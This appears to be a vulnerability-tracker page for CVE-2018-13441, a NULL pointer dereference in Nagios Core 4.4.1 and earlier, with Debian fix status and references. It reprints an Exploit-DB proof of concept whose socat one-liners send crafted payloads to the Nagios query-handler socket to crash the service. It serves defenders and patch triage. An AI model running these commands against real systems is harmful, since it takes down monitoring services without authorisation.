VIR Vulnerability Intelligence Relay

CVE-2018-13441

unknown
Published — · Modified —
💬 Discuss on Community ✚ Propose mitigation
CVSS v3
CVSS v4 NEW
not yet in upstream
VIR risk
1.0

Description

qh_help in Nagios Core version 4.4.1 and earlier is prone to a NULL pointer dereference vulnerability, which allows attacker to cause a local denial-of-service condition by sending a crafted payload to the listening UNIX socket.

Predictions

Exploit likelihood
20%
Patch ETA

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

Mitigation details

Source: Debian Security Tracker · View original ↗ · DFSG

CVE-2018-13441 NameCVE-2018-13441 Descriptionqh_help in Nagios Core version 4.4.1 and earlier is prone to a NULL pointer dereference vulnerability, which allows attacker to cause a local denial-of-service condition by sending a crafted payload to the listening UNIX socket. SourceCVE (at NVD; CERT, ENISA, LWN, oss-sec, fulldisc, Debian ELTS, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, GitHub…

CVE-2018-13441

NameCVE-2018-13441
Descriptionqh_help in Nagios Core version 4.4.1 and earlier is prone to a NULL pointer dereference vulnerability, which allows attacker to cause a local denial-of-service condition by sending a crafted payload to the listening UNIX socket.
SourceCVE (at NVD; CERT, ENISA, LWN, oss-sec, fulldisc, Debian ELTS, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, GitHub advisories/code/issues, web search, more)
Debian Bugs917160

Vulnerable and fixed packages

The table below lists information on source packages.

Source PackageReleaseVersionStatus
nagios4 (PTS)bookworm, bullseye4.4.6-4fixed
bookworm (security)4.4.6-4+deb12u1fixed
trixie4.4.6-4.1fixed
trixie (security)4.4.6-4.1+deb13u1fixed
sid4.5.12+ds-1fixed

The information below is based on the following data on fixed versions.

PackageTypeReleaseFixed VersionUrgencyOriginDebian Bugs
nagios4source(unstable)4.3.4-3low917160

Notes

https://gist.github.com/fakhrizulkifli/8df4a174158df69ebd765f824bd736b8
https://github.com/NagiosEnterprises/nagioscore/commit/b1a92a3b52d292ccb601e77a0b29cb1e67ac9d76

Home - Debian Security - Source (Git)

Apply commands

text fix
Notes
https://gist.github.com/fakhrizulkifli/8df4a174158df69ebd765f824bd736b8https://github.com/NagiosEnterprises/nagioscore/commit/b1a92a3b52d292ccb601e77a0b29cb1e67ac9d76

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-45082 dos linux text · 1 KB
Fakhri Zulkifli · 2018-07-24

Nagios Core 4.4.1 - Denial of Service

text exploit Source: Exploit-DB 
# Exploit Title: Nagios Core Multiple Local Denial of Service
# Date: 2018-07-09
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: https://www.nagios.org/
# Software Link: https://www.nagios.org/downloads/nagios-core/
# Version: 4.4.1 and earlier
# Tested on: 4.4.1


qh_core, qh_help, and qh_echo in Nagios Core 4.4.1 and earlier is prone to a NULL pointer dereference vulnerability, which allows attackers to cause a local denial-of-service condition by sending a crafted payload to the listening UNIX socket.

1. [CVE-2018-13458] qh_core

$ echo -ne “#core\0" | socat unix-connect:./poc/nagios.qh -
$ echo -ne “@core\0" | socat unix-connect:./poc/nagios.qh -

2. [CVE-2018-13457] qh_echo

$ echo -ne "#echo\0" | socat unix-connect:./poc/nagios.qh -
$ echo -ne “@echo\0" | socat unix-connect:./poc/nagios.qh -

3. [CVE-2018-13441] qh_help

$ echo -ne “#help\0" | socat unix-connect:./poc/nagios.qh -
$ echo -ne “@help\0" | socat unix-connect:./poc/nagios.qh -

OS impact
debian Debian Fixed 5 releases
VersionStatusFixed in
trixie Fixed 4.3.4-3
sid Fixed 4.3.4-3
forky Fixed 4.3.4-3
bullseye Fixed 4.3.4-3
bookworm Fixed 4.3.4-3

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.